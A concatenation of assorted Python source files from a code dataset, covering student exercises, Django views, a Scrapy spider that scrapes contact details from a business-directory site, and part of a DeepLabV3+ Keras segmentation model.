build_default_simple_reentrant_line_simulator(seed)\n\n fig = plt.figure(figsize=(6, 6))\n ax1 = fig.add_subplot(111)\n\n handlers = [hand.StateCostPlotter(num_simulation_steps, time_interval, plot_frequency,\n ax=ax1, testing_mode=True)]\n reporter = rep.Reporter(handlers=handlers)\n\n # Run Simulation\n with snc.simulation.plot.plotting_utils.non_gui_matplotlib():\n hedgehog_simulator.run(num_simulation_steps, reporter=reporter)\n\n for h in handlers:\n assert h.data_cache.shape[1] == num_simulation_steps\n assert not np.all(h.data_cache == np.zeros_like(h.data_cache))\n\n\ndef test_multiple_handlers():\n \"\"\"Test live plotting works with multiple handlers \"\"\"\n\n seed = 42\n np.random.seed(seed)\n num_simulation_steps = 30\n time_interval = 1\n plot_frequency = 10\n\n hedgehog_simulator = build_default_simple_reentrant_line_simulator(seed)\n\n handlers = [\n hand.StateCostPlotter(num_simulation_steps, time_interval, plot_frequency,\n testing_mode=True),\n hand.WorkloadPlotter(num_simulation_steps, time_interval, plot_frequency, testing_mode=True)\n ]\n\n reporter = rep.Reporter(handlers=handlers)\n\n # Run Simulation\n with snc.simulation.plot.plotting_utils.non_gui_matplotlib():\n hedgehog_simulator.run(num_simulation_steps, reporter=reporter)\n\n for h in handlers:\n assert h.data_cache.shape[1] == num_simulation_steps\n assert not np.all(h.data_cache == np.zeros_like(h.data_cache))\n","sub_path":"tests/snc/simulation/plot/test_live_plotting.py","file_name":"test_live_plotting.py","file_ext":"py","file_size_in_byte":2897,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"54238395","text":"from math import *\nnum = int(input(\"Insira um numero: \"))\npi = 12**(1/2)\nnmd = 1\nden1 = 1\nden2 = 3\nden2exp = 0\ncount = 0\nsinal = 1\nresult = 0.0\n\nwhile (count < num):\n\tresult = result + (sinal*(nmd/(den1*(den2**den2exp))))\n\tsinal = sinal *(-1)\n\tden1 = den1 + 2\n\tden2exp = den2exp + 1\n\tcount = count + 1\n\n\npi = pi * result\nprint(round(pi,8))\n\n\n","sub_path":"exs/1199-1141.py","file_name":"1199-1141.py","file_ext":"py","file_size_in_byte":342,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"114572492","text":"from gpb import *\nimport findthebox as ftb\nimport random\n# Defining Node Functions\n\n# movement Functions\ndef upF(l):\n\tcurrentLevel.player.moveY(currentLevel, -1)\n\tif currentLevel.win is False:\n\t\tcurrentLevel.playermoves += 1\n\treturn l[0]\nup = fwrapper(upF, 1, 'Up')\n\n\ndef downF(l):\n\tcurrentLevel.player.moveY(currentLevel, 1)\n\tif currentLevel.win is False:\n\t\tcurrentLevel.playermoves += 1\n\treturn l[0]\ndown = fwrapper(downF, 1, 'down')\n\n\ndef leftF(l):\n\tcurrentLevel.player.moveX(currentLevel, -1)\n\tif currentLevel.win is False:\n\t\tcurrentLevel.playermoves += 1\n\treturn l[0]\nleft = fwrapper(leftF, 1, 'left')\n\n\ndef rightF(l):\n\tcurrentLevel.player.moveX(currentLevel, 1)\n\tif currentLevel.win is False:\n\t\tcurrentLevel.playermoves += 1\n\treturn l[0]\nright = fwrapper(rightF, 1, 'right')\n\n# logic Functions\ndef iffunc(l):\n\tif l[0] > 0:\n\t\treturn l[1]\n\telse:\n\t\treturn l[2]\nifw = fwrapper(iffunc, 3, 'if')\n\n\ndef andfunc(l):\n\tpass\n\n\ndef forloop(l):\n\tpass\n\n\ndef isgreater(l):\n\tif l[0] > l[1]:\n\t\treturn 1\n\telse:\n\t\treturn 0\ngtw = fwrapper(isgreater, 2, 'isgreater')\n\nflist = [up, down, left, right]\n# removed: ifw, gtw\n\n\ndef scoreFunction(tree, levelSet):\n\tscores = []\n\tfor level in levelSet:\n\t\tcurrentLevel = level\n\t\ttree.evaluate()\n\t\tif currentLevel.win is True:\n\t\t\tscores.append(currentLevel.playermoves)\n\treturn (len(scores), (sum(scores)/len(scores))) # number of wins, avg moves\n\n\ndef createLevelset(n, height, width, obstructionN):\n\tlevels = []\n\tfor x in range(0, n):\n\t\tL = ftb.level()\n\t\tlevels.append(L)\n\tfor L in levels:\n\t\tL.generateRandom(height, width, obstructionN)\n\treturn levels\n\nlevelSet = createLevelset(10, 10, 10, 20)\nfor L in levelSet:\n\tL.display()\n\ntree = makerandomtree(2, flist)\nprint(tree.display())","sub_path":"Gameloop.py","file_name":"Gameloop.py","file_ext":"py","file_size_in_byte":1709,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"633334188","text":"# Bats2.py \n# Rewrite bat names\n# Lindsay Williams \n# Feb 12, 2020\n\n# import modules\n# Add varaibles\n# Ask for input\n# Calculate population estimation\n# print results\n\nspecies1_input = raw_input(\"What is the name of species 1? \" )\n##NAME = (\"Myotis austroriparius\")\n##print(species1_input)\nspecies2_input = raw_input(\"What is the name of species 2? \" )\n##print(species2_input)\n##NAME2 = (\"Myotis septentrionalis\")\nspecies3_input = raw_input(\"What is the name of species 3? \" )\n##NAME3 = {\"Eptesicus fuscus\"}\n##print(species3_input)\n\nspecies_1 = str.upper(species1_input)\nspecies_2 = str.upper(species2_input) \nspecies_3 = str.upper(species3_input) \n\n\nstring1 = species_1[0:3] + species_1[7:10] + \" \\n\" \nstring2 = species_2[0:3] + species_2[7:10] + \" \\n\" \nstring3 = species_3[0:3] + species_3[10:13] + \" \\n\" \n\nnew_statement = \"There are three species of bats: \" + \"\\n\" + string1 + string2 + string3\nprint(new_statement) \n","sub_path":"Bats.py","file_name":"Bats.py","file_ext":"py","file_size_in_byte":923,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"365022313","text":"\n\n#calss header\nclass _BACKYARD():\n\tdef __init__(self,): \n\t\tself.name = \"BACKYARD\"\n\t\tself.definitions = [u'a small space surrounded by walls at the back of a house, usually with a hard surface: ', u'a space at the back of a house, usually surrounded by a fence, and covered with grass: ']\n\n\t\tself.parents = []\n\t\tself.childen = []\n\t\tself.properties = []\n\t\tself.jsondata = {}\n\n\n\t\tself.specie = 'nouns'\n\n\n\tdef run(self, obj1 = [], obj2 = []):\n\t\treturn self.jsondata\n","sub_path":"xai/brain/wordbase/nouns/_backyard.py","file_name":"_backyard.py","file_ext":"py","file_size_in_byte":463,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"9828101","text":"from TitikPoetryApp.models import Recruit, Tula, ProjectSigya, Comments\nfrom django.shortcuts import render, redirect\nfrom .forms import TulaForm\ndef Page(request):\n\treturn render(request, 'Steps.html')\ndef SecondPage(request):\n\tjenjie=Recruit.objects.create(\n\t\tname = request.POST['name'],\n\t\temail = request.POST['email'],\n\t\tgender = request.POST['gender'],\n\t\tbirthday = request.POST['birthday']\n\t\t)\n\treturn redirect('Poetry')\t\n\treturn render(request, 'Steps.html')\n\n\ndef Poetry(request):\n\treturn render(request, 'Titikpoetry.html')\ndef TitikPoetry(request):\n\trufino=Tula.objects.create(\n\t\ttitle_tula = request.POST['name'],\n\t\ttext = request.POST['Tula'],\n\t\tvideo_file = request.FILES['video'],\n\t\t)\n\treturn redirect('Sigya')\n\treturn render(request, 'Titikpoetry.html')\n\ndef Sigya(request):\n\treturn render(request, 'Titiksigya.html')\n\ndef TitikSigya(request):\n\tredem=ProjectSigya.objects.create(\n\t\tbook_donation = request.FILES['picture'],\n\t\tmessagebox = request.POST['texts'],\n\t\tinteger = request.POST['nums'],\n\t\tdate1 = request.POST['dates'],\n\t\t)\n\treturn redirect('TitikEnterprise')\n\treturn render(request, 'Titiksigya.html')\n\ndef TitikEnterprise(request):\n\treturn render(request, 'TitikEnterprise.html')\ndef TitikEnterprise(request):\n\tjenjie=Recruit.objects.all()\n\tredem=Tula.objects.all()\n\tlawrence=ProjectSigya.objects.all()\n\tcontext ={'jenjie':jenjie,'redem':redem, 'lawrence':lawrence}\n\treturn render(request, 'Titikenterprise.html', context)\n\ndef Titikvideo(request):\n\treturn render(request, 'Titikvideo.html')\ndef Titikvideo(request):\n\tjenjie=Recruit.objects.all()\n\tredem=Tula.objects.all()\n\tlawrence=ProjectSigya.objects.all()\n\tcontext ={'jenjie':jenjie,'redem':redem, 'lawrence':lawrence}\n\treturn render(request, 'Titikvideo.html', context)\ndef Titikpoetry2(request):\n\treturn render(request, 'Titikpoetry2.html')\ndef Titikpoetry2(request):\n\tjenjie=Recruit.objects.all()\n\tredem=Tula.objects.all()\n\tlawrence=ProjectSigya.objects.all()\n\tcontext ={'jenjie':jenjie,'redem':redem, 'lawrence':lawrence}\n\n\treturn render(request, 'Titikpoetry2.html', context)\n\ndef person(request, pk_test):\n\tperson = Recruit.objects.get(id=pk_test)\n\tacey = person.tula_set.all()\n\n\n\tcontext = {'person':person, 'acey':acey}\n\treturn render(request, 'person.html',context)\n\n\n\n\n\n\ndef updateTula(request, pk):\n\n\tjenjie = Tula.objects.get(id=pk)\n\tform = TulaForm(instance=jenjie)\n\n\tif request.method == 'POST':\n\t\tform = TulaForm(request.POST, instance=jenjie)\n\t\tif form.is_valid():\n\t\t\tform.save()\n\t\t\treturn redirect('/')\n\n\tcontext = {'form':form}\n\treturn render(request, 'update.html', context)\n\ndef deleteTula(request, pk):\n\tjenjie = Tula.objects.get(id=pk)\n\tif request.method == \"POST\":\n\t\tjenjie.delete()\n\t\treturn redirect('/')\n\n\tcontext = {'item':jenjie}\n\treturn render(request, 'delete.html', context)\n","sub_path":"TitikPoetryApp/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2786,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"406874697","text":"# python3\nclass Queue:\n def __init__(self,K):\n self.pushStack = []\n self.popStack = []\n self.K = K\n\n def enqueue(self,value):\n if(len(self.pushStack)==0):\n self.pushStack.append([value,value])\n elif(len(self.pushStack)>0 and not self.isFull()):\n if(value>=self.pushStack[-1][1]):\n self.pushStack.append([value,value])\n else:\n self.pushStack.append([value,self.pushStack[-1][1]])\n\n if(self.isFull()):\n while(len(self.pushStack)>0):\n val = self.pushStack.pop()\n if(len(self.popStack)==0):\n element = [val[0],val[0]]\n self.popStack.append(element)\n else:\n element = (val[0],max(val[0],self.popStack[-1][1]))\n self.popStack.append(element)\n\n\n def dequeue(self):\n if(len(self.pushStack)>0 and len(self.popStack)>0):\n val = self.popStack.pop()\n return max(self.pushStack[-1][1],val[1])\n elif(len(self.pushStack)==0):\n return self.popStack.pop()[1]\n\n def isFull(self):\n if(len(self.pushStack)==self.K):\n return True\n return False\n\n\n\ndef max_sliding_window_naive(sequence, m):\n queue = Queue(m)\n maximums = []\n for a in range(m):\n queue.enqueue(sequence[a])\n for i in range(m,len(sequence)+1):\n maximum = queue.dequeue()\n maximums.append(maximum)\n if(i>1:\n num>>=1\n tmp.append(num)\n if num!=1 and num&1:\n tmp.append(num*3+1)\n return hailstone(3*num+1,tmp)\n return tmp,len(tmp)\n\ndef hailstone2(num):\n result=[]\n while num!=1:\n if num&1:\n num=num*3+1\n result.append(num)\n else:\n num>>=1\n result.append(num)\n return result,len(result)\n\n# 2 最大公约数 50 70 50 20 50 10\ndef divisorMax(a,b):\n if a>b:\n a,b=b,a\n flag=b%a\n return divisorMax(a,flag) if flag else a\n\n# 最小公倍数 6 8 2 24\ndef multipleMin(a,b):\n return a*b//divisorMax(a,b)\n# 求三个数的最大公约数\ndef gcd(a,b,c):\n tmp1=divisorMax(a,b)\n return divisorMax(tmp1,c)\n\ndef lcm(a,b,c):\n return multipleMin(multipleMin(a,b),c)\nif __name__ == \"__main__\":\n # print(hailstone(43))\n # print(hailstone2(43))\n \n # print(max(a))\n \n # print(reduce(lambda x,y:x if x>y else y,a)) # 求数组最大值\n\n print(divisorMax(1997,615))\n print(multipleMin(36,50))\n print(gcd(2,7,6))\n print(lcm(2,7,6))","sub_path":"18.algorithm/13.mathDemo.py","file_name":"13.mathDemo.py","file_ext":"py","file_size_in_byte":1527,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"69158847","text":"from django.conf.urls import url,include\n\nfrom .views import UserinfoView,UploadImageView,UpdatePwdView,SendEmailCodeView,\\\n UpdateEmailView,MyCourseView,MyFavOrgView,MyFavTeacherView,MyFavCoureseView,MymessageView\n\nurlpatterns = [\n # 用户信息\n url(r'^info/$',UserinfoView.as_view(),name='user_info'),\n\n # 用户头像上传\n url(r'^image/upload/$',UploadImageView.as_view(),name='image_upload'),\n\n # 个人中心修改密码\n url(r'^update/pwd/$',UpdatePwdView.as_view(),name='update_pwd'),\n\n # 发送邮箱验证码\n url(r'^sendemail_code/$',SendEmailCodeView.as_view(),name='sendemail_code'),\n\n # 修改邮箱\n url(r'^update_email/$',UpdateEmailView.as_view(),name='update_email'),\n # 我的课程\n url(r'^mycourse/$',MyCourseView.as_view(),name='mycourse'),\n # 我收藏的课程机构\n url(r'^myfav/org/$',MyFavOrgView.as_view(),name='mayfav_org'),\n # 我收藏的授课老师\n url(r'^myfav/teacher/$',MyFavTeacherView.as_view(),name='mayfav_teacher'),\n # 我收藏的课程\n url(r'^myfav/course/$',MyFavCoureseView.as_view(),name='mayfav_course'),\n # 我收藏的消息\n url(r'^mymessage/$',MymessageView.as_view(),name='mymessage'),\n]\n\n\n\n","sub_path":"apps/users/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1212,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"423301557","text":"# -*- coding: utf-8 -*-\nimport copy\nimport scrapy\nfrom youboy.items import YouboyItem\n\nclass YSpider(scrapy.Spider):\n name = 'y'\n # allowed_domains = ['youboy.com']\n # start_urls = ['http://youboy.com/']\n start_urls = [\"http://www.youboy.com/\"]\n base_url = 'http://www.youboy.com'\n # 这是一个动态域\n def __init__(self, *args, **kwargs):\n # Dynamically define the allowed domains list.\n domain = kwargs.pop('domain', '')\n self.allowed_domains = filter(None, domain.split(','))\n super(YSpider, self).__init__(*args, **kwargs)\n # 获取所有大分类\n def parse(self,response):\n divs = response.xpath(\"//div[@class='col-xs-6']/div[@class='ui-index-classify-list']\")\n for div in divs:\n for a in div.xpath(\"./ul/li/a\"):\n item = YouboyItem()\n tag = a.xpath(\"./text()\").extract_first()\n print(tag)\n item['tag'] = tag\n link = self.base_url + a.xpath(\"./@href\").extract_first()\n yield scrapy.Request(link,callback=self.parse_page,meta={'item': item}, dont_filter=True)\n # 页面解析和翻页\n def parse_page(self, response):\n # print(response.url)\n item = response.meta['item']\n names = response.xpath(\"//div[@class='searchPdListConLItem']\")\n for name in names:\n link=name.xpath(\".//div[@class='pdListTitle']/p/a/@href\").extract_first() + \"contact.html\"\n print(link)\n yield scrapy.Request(link,callback=self.parse_shop, meta={'item': item},dont_filter=True)\n next_page = response.xpath(\"//div[@class='searchPages']/span/a[@class='next']/@href\")\n if next_page:\n yield scrapy.Request(next_page.extract_first(),callback=self.parse_page, meta={'item': item},dont_filter=True)\n # 详情也拿数据\n # 这里有几种网页格式,蛋疼,如果有更多那就全部写成函数放到一个文件里面\n def parse_shop(self,response):\n if response.text:\n item = response.meta['item']\n name = response.xpath(\"//div[@class='lianxi_wrap']/div[@class='lianxi']/p[1]/font/text()\")\n if name:\n name= response.xpath(\"//div[@class='lianxi_wrap']/div[@class='lianxi']/p[1]/font/text()\")\n name = name.extract_first() if len(name) >0 else None\n addr = response.xpath(\"//div[@class='lianxi_wrap']/div[@class='lianxi']/p[2]/i/text()\")\n addr = ''.join(addr.extract()) if len(addr) >0 else None\n div = response.xpath(\"//div[@class='lianxi_wrap']/div[3]/ul\")\n fa = div.xpath(\"./li[1]/text()\")\n fa = ''.join(fa.extract()).strip('\\n\\t ').strip('\\r\\n\\t ') if len(fa) >0 else None\n tel1 = div.xpath(\"./li[2]/text()\")\n tel1 = ''.join(tel1.extract()).strip('\\r\\n\\t ').strip('\\t\\r\\n ') if len(tel1) >0 else None\n tel2 = div.xpath(\"./li[3]/text()\")\n tel2 = ''.join(tel2.extract()).strip('\\n\\t ').strip('\\t\\r\\n\\t ') if len(tel2) >0 else None\n email = div.xpath(\"./li[5]/text()\")\n email = ''.join(email.extract()).strip('\\n\\t ').strip('\\r\\n\\t ') if len(email) >0 else None\n link = response.url\n elif response.xpath(\"//div[@class='contactCard']//tbody\"):\n trs = response.xpath(\"//div[@class='contactCard']//tbody\")[0]\n name = trs.xpath(\"./tr[1]/td[@class='nameTit01']/text()\")\n name = name.extract_first() if len(name) else None\n addr = trs.xpath(\"./tr[2]/td/i/text()\")\n addr = ''.join(addr.extract()) if len(addr) else None\n fa = trs.xpath(\"./tr[3]/td[2]/text()\")\n fa = fa.extract_first() if len(fa) else None\n tel1 = trs.xpath(\"./tr[3]/td[4]/text()\")\n tel1 = tel1.extract_first() if len(tel1) else None\n tel2 = trs.xpath(\"./tr[3]/td[6]/text()\")\n tel2 = tel2.extract_first() if len(tel2) else None\n email = trs.xpath(\"./tr[4]/td[4]/text()\")\n email = email.extract_first() if len(email) else None\n link = response.url\n elif response.xpath(\"//div[@class='lxcon']/ul\"):\n div = response.xpath(\"//div[@class='lxcon']/ul\")[0]\n name = div.xpath(\"./li[1]/b/font/text()\")\n name = name.extract_first() if len(name) else None\n addr = div.xpath(\"./li[2]/i//text()\")\n addr = ''.join(addr.extract()) if len(addr) else None\n fa = div.xpath(\"./li[3]/text()\")\n fa = fa.extract() if len(fa) else None\n tel1 = div.xpath(\"./li[5]/text()\")\n tel1 = tel1.extract() if len(tel1) else None\n tel2 = div.xpath(\"./li[6]/text()\")\n tel2 = tel2.extract() if len(tel2) else None\n email = div.xpath(\"./li[9]/a/text()\")\n email = email.extract() if len(email) else None\n link = response.url\n elif response.xpath(\"//tbody/tr/td[1]/strong/text()\"):\n name = response.xpath(\"//tbody/tr/td[1]/strong/text()\")\n name = name.extract_first() if len(name) else None\n addr = response.xpath(\"//tbody/tr/td[1]/p/text()[1]\")\n addr = ''.join(addr.extract()) if len(addr) else None\n fa = response.xpath(\"//tbody/tr/td[1]/p/text()[3]\")\n fa = fa.extract_first() if len(fa) else None\n tel1 = response.xpath(\"//tbody/tr/td[1]/p/text()[4]\")\n tel1 = tel1.extract_first() if len(tel1) else None\n tel2 = response.xpath(\"//tbody/tr/td[1]/p/text()[5]\")\n tel2 = tel2.extract_first() if len(tel2) else None\n email = response.xpath(\"//tbody/tr/td[1]/p/text()[7]\")\n email = email.extract_first() if len(email) else None\n link = response.url\n else:\n div = response.xpath(\"//div[@class='contactCard']/div/ul\")[0]\n name = div.xpath(\"./li[1]/strong/text()\")\n name = name.extract_first() if len(name) > 0 else None\n addr = div.xpath(\"./li[2]/span//text()\")\n addr = ''.join(addr) if len(addr) > 0 else None\n fa = div.xpath(\"./li[3]/span/text()\")\n fa = fa.extract_first() if len(fa) > 0 else None\n tel1 = div.xpath(\"./li[4]/span/text()\")\n tel1 = tel1.extract_first() if len(tel1) > 0 else None\n tel2 = div.xpath(\"./li[5]/span/text()\")\n tel2 = tel1.extract_first() if len(tel2) > 0 else None\n email = div.xpath(\"./li[7]/span/text()\")\n email = email.extract_first() if len(email) > 0 else None\n link = response.url\n\n item['name'] = name\n item['addr'] = addr\n item['fa'] = fa\n item['tel1'] = tel1\n item['tel2'] = tel2\n item['email'] = email\n item['link'] = link\n print(item)\n yield item\n\n\n\n\n","sub_path":"youboy/spiders/y.py","file_name":"y.py","file_ext":"py","file_size_in_byte":7180,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"420778387","text":"# Use open to open file \"foo.txt\" for reading\nf = open('foo.txt', \"r\")\n# Print all the lines in the file\nlines = f.readlines()\nprint(lines)\n# Close the file\nf.close()\n\n\n# # Use open to open file \"bar.txt\" for writing\n# f = open('bar.txt', 'w')\n\n# # Use the write() method to write three lines to the file\n# f.write(\"\"\"line 1\n# line2\n# line 3\"\"\")\n\n# # Close the file\n# f.close()","sub_path":"src/day-1-toy/fileio.py","file_name":"fileio.py","file_ext":"py","file_size_in_byte":377,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"434439757","text":"#open 函数\nfo = open(\"foo.txt\", \"wb\")\n\n#write()方法\nfo.write(bytes(\"www.runoob.com!\\nVery good site!\\n\", 'utf-8'))\n\n#close()方法\nfo.close()\n\n#\nfo = open(\"foo.txt\", \"r+\")\n\n#read()方法\nstr = fo.read(20);\n\nprint (\"读取的字符串是 : \", str)\n\nfo.close()\n\nposition = fo.tell();\nprint (\"当前文件位置 : \", position)","sub_path":"IO/File_1.py","file_name":"File_1.py","file_ext":"py","file_size_in_byte":327,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"442743689","text":"from django.shortcuts import render\nfrom posts.models import Post\n# Create your views here.\n\ndef home_view(request):\n tags = Post.tag.all()\n lenTags = int(len(tags)/2)\n tags_1st = tags[:lenTags]\n tags_2nd = tags[lenTags:]\n print(lenTags)\n\n context={\n 'tags_1st': tags_1st,\n 'tags_2nd': tags_2nd\n }\n\n return render(request, 'posts/home.html', context)","sub_path":"home/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":388,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"119312493","text":"import numpy as np\nimport tensorflow as tf\nfrom keras import backend as K\nfrom keras.models import Model\nfrom keras.layers import (Input,Add,add,concatenate,Activation,concatenate,\n Concatenate,Dropout,BatchNormalization,Reshape,Permute,\n Dense,UpSampling2D,Flatten,Lambda,Activation,Conv2D,\n DepthwiseConv2D,ZeroPadding2D,GlobalAveragePooling2D,\n MaxPooling2D,AveragePooling2D,LeakyReLU,Conv2DTranspose)\n \nfrom keras.regularizers import l2\nfrom keras.utils.layer_utils import get_source_inputs\nfrom keras.utils.data_utils import get_file\nfrom keras.activations import relu\nfrom keras.optimizers import SGD, Adam\n\n\nWEIGHTS_PATH_X = \"https://github.com/bonlime/keras-deeplab-v3-plus/releases/download/1.1/deeplabv3_xception_tf_dim_ordering_tf_kernels.h5\"\nWEIGHTS_PATH_MOBILE = \"https://github.com/bonlime/keras-deeplab-v3-plus/releases/download/1.1/deeplabv3_mobilenetv2_tf_dim_ordering_tf_kernels.h5\"\nWEIGHTS_PATH_X_CS = \"https://github.com/bonlime/keras-deeplab-v3-plus/releases/download/1.2/deeplabv3_xception_tf_dim_ordering_tf_kernels_cityscapes.h5\"\nWEIGHTS_PATH_MOBILE_CS = \"https://github.com/bonlime/keras-deeplab-v3-plus/releases/download/1.2/deeplabv3_mobilenetv2_tf_dim_ordering_tf_kernels_cityscapes.h5\"\nweight_decay = 1e-5\n\n\ndef SepConv_BN(x, filters, prefix, stride=1, kernel_size=3, rate=1, depth_activation=False, epsilon=1e-3):\n \"\"\" SepConv with BN between depthwise & pointwise. Optionally add activation after BN\n Implements right \"same\" padding for even kernel sizes\n Args:\n x: input tensor\n filters: num of filters in pointwise convolution\n prefix: prefix before name\n stride: stride at depthwise conv\n kernel_size: kernel size for depthwise convolution\n rate: atrous rate for depthwise convolution\n depth_activation: flag to use activation between depthwise & poinwise convs\n epsilon: epsilon to use in BN layer\n \"\"\"\n\n if stride == 1:\n depth_padding = 'same'\n else:\n kernel_size_effective = kernel_size + (kernel_size - 1) * (rate - 1)\n pad_total = kernel_size_effective - 1\n pad_beg = pad_total // 2\n pad_end = pad_total - pad_beg\n x = ZeroPadding2D((pad_beg, pad_end))(x)\n depth_padding = 'valid'\n\n if not depth_activation:\n x = Activation('relu')(x)\n x = DepthwiseConv2D((kernel_size, kernel_size), strides=(stride, stride), dilation_rate=(rate, rate),\n padding=depth_padding, use_bias=False, name=prefix + '_depthwise')(x)\n x = BatchNormalization(name=prefix + '_depthwise_BN', epsilon=epsilon)(x)\n if depth_activation:\n x = Activation('relu')(x)\n x = Conv2D(filters, (1, 1), padding='same',\n use_bias=False, name=prefix + '_pointwise')(x)\n x = BatchNormalization(name=prefix + '_pointwise_BN', epsilon=epsilon)(x)\n if depth_activation:\n x = Activation('relu')(x)\n\n return x\n\n\ndef _conv2d_same(x, filters, prefix, stride=1, kernel_size=3, rate=1):\n \"\"\"Implements right 'same' padding for even kernel sizes\n Without this there is a 1 pixel drift when stride = 2\n Args:\n x: input tensor\n filters: num of filters in pointwise convolution\n prefix: prefix before name\n stride: stride at depthwise conv\n kernel_size: kernel size for depthwise convolution\n rate: atrous rate for depthwise convolution\n \"\"\"\n if stride == 1:\n return Conv2D(filters,\n (kernel_size, kernel_size),\n strides=(stride, stride),\n padding='same', use_bias=False,\n dilation_rate=(rate, rate),\n name=prefix)(x)\n else:\n kernel_size_effective = kernel_size + (kernel_size - 1) * (rate - 1)\n pad_total = kernel_size_effective - 1\n pad_beg = pad_total // 2\n pad_end = pad_total - pad_beg\n x = ZeroPadding2D((pad_beg, pad_end))(x)\n return Conv2D(filters,\n (kernel_size, kernel_size),\n strides=(stride, stride),\n padding='valid', use_bias=False,\n dilation_rate=(rate, rate),\n name=prefix)(x)\n\n\ndef _xception_block(inputs, depth_list, prefix, skip_connection_type, stride,\n rate=1, depth_activation=False, return_skip=False):\n \"\"\" Basic building block of modified Xception network\n Args:\n inputs: input tensor\n depth_list: number of filters in each SepConv layer. len(depth_list) == 3\n prefix: prefix before name\n skip_connection_type: one of {'conv','sum','none'}\n stride: stride at last depthwise conv\n rate: atrous rate for depthwise convolution\n depth_activation: flag to use activation between depthwise & pointwise convs\n return_skip: flag to return additional tensor after 2 SepConvs for decoder\n \"\"\"\n residual = inputs\n for i in range(3):\n residual = SepConv_BN(residual,\n depth_list[i],\n prefix + '_separable_conv{}'.format(i + 1),\n stride=stride if i == 2 else 1,\n rate=rate,\n depth_activation=depth_activation)\n if i == 1:\n skip = residual\n if skip_connection_type == 'conv':\n shortcut = _conv2d_same(inputs, depth_list[-1], prefix + '_shortcut',\n kernel_size=1,\n stride=stride)\n shortcut = BatchNormalization(name=prefix + '_shortcut_BN')(shortcut)\n outputs = add([residual, shortcut])\n elif skip_connection_type == 'sum':\n outputs = add([residual, inputs])\n elif skip_connection_type == 'none':\n outputs = residual\n if return_skip:\n return outputs, skip\n else:\n return outputs\n\n\ndef relu6(x):\n return relu(x, max_value=6)\n\n\ndef _make_divisible(v, divisor, min_value=None):\n if min_value is None:\n min_value = divisor\n new_v = max(min_value, int(v + divisor / 2) // divisor * divisor)\n # Make sure that round down does not go down by more than 10%.\n if new_v < 0.9 * v:\n new_v += divisor\n return new_v\n\n\ndef _inverted_res_block(inputs, expansion, stride, alpha, filters, block_id, skip_connection, rate=1):\n in_channels = inputs.shape[-1] # inputs._keras_shape[-1]\n pointwise_conv_filters = int(filters * alpha)\n pointwise_filters = _make_divisible(pointwise_conv_filters, 8)\n x = inputs\n prefix = 'expanded_conv_{}_'.format(block_id)\n if block_id:\n # Expand\n print(\"=========>>>>>>\",expansion * in_channels)\n x = Conv2D(int(expansion * in_channels), kernel_size=1, padding='same',\n use_bias=False, activation=None,name=prefix + 'expand')(x)\n x = BatchNormalization(epsilon=1e-3, momentum=0.999,\n name=prefix + 'expand_BN')(x)\n x = Activation(relu6, name=prefix + 'expand_relu')(x)\n else:\n prefix = 'expanded_conv_'\n # Depthwise\n x = DepthwiseConv2D(kernel_size=3, strides=stride, activation=None,\n use_bias=False, padding='same', dilation_rate=(rate, rate),\n name=prefix + 'depthwise')(x)\n x = BatchNormalization(epsilon=1e-3, momentum=0.999,\n name=prefix + 'depthwise_BN')(x)\n\n x = Activation(relu6, name=prefix + 'depthwise_relu')(x)\n\n # Project\n x = Conv2D(pointwise_filters,\n kernel_size=1, padding='same', use_bias=False, activation=None,\n name=prefix + 'project')(x)\n x = BatchNormalization(epsilon=1e-3, momentum=0.999,\n name=prefix + 'project_BN')(x)\n\n if skip_connection:\n return Add(name=prefix + 'add')([inputs, x])\n\n # if in_channels == pointwise_filters and stride == 1:\n # return Add(name='res_connect_' + str(block_id))([inputs, x])\n\n return x\n\ndef residualDilatedInceptionModule(y, nb_channels, _strides=(1, 1),t=\"e\"):\n if t==\"d\":\n y = Conv2D(nb_channels, kernel_size=(1, 1), strides=(1, 1),kernel_initializer = 'orthogonal',kernel_regularizer= l2(5e-4), padding='same', use_bias=False)(y)\n y = BatchNormalization()(y)\n y = LeakyReLU()(y)\n y = Conv2D(nb_channels, kernel_size=(1, 1), strides=(1, 1),kernel_initializer = 'orthogonal',kernel_regularizer= l2(5e-4), padding='same', use_bias=False)(y)\n y = BatchNormalization()(y)\n y = LeakyReLU()(y)\n\n\n A1 = Conv2D(nb_channels, kernel_size=(3, 3), strides=_strides,kernel_initializer = 'orthogonal',kernel_regularizer= l2(5e-4), padding='same', use_bias=False)(y)\n A1 = BatchNormalization()(A1)\n A1 = LeakyReLU()(A1)\n A1 = Conv2D(nb_channels, kernel_size=(3, 3), strides=_strides,kernel_initializer = 'orthogonal',kernel_regularizer= l2(5e-4), padding='same', use_bias=False)(A1)\n A1 = BatchNormalization()(A1)\n A1 = LeakyReLU()(A1)\n\n\n A4 = Conv2D(nb_channels, kernel_size=(3, 3), strides=_strides,kernel_initializer = 'orthogonal',kernel_regularizer= l2(5e-4), dilation_rate=4, padding='same', use_bias=False)(y)\n A4 = BatchNormalization()(A4)\n A4 = LeakyReLU()(A4)\n A4 = Conv2D(nb_channels, kernel_size=(3, 3), strides=_strides,kernel_initializer = 'orthogonal',kernel_regularizer= l2(5e-4), dilation_rate=4, padding='same', use_bias=False)(A4)\n A4 = BatchNormalization()(A4)\n A4 = LeakyReLU()(A4)\n\n if (t==\"e\"):\n 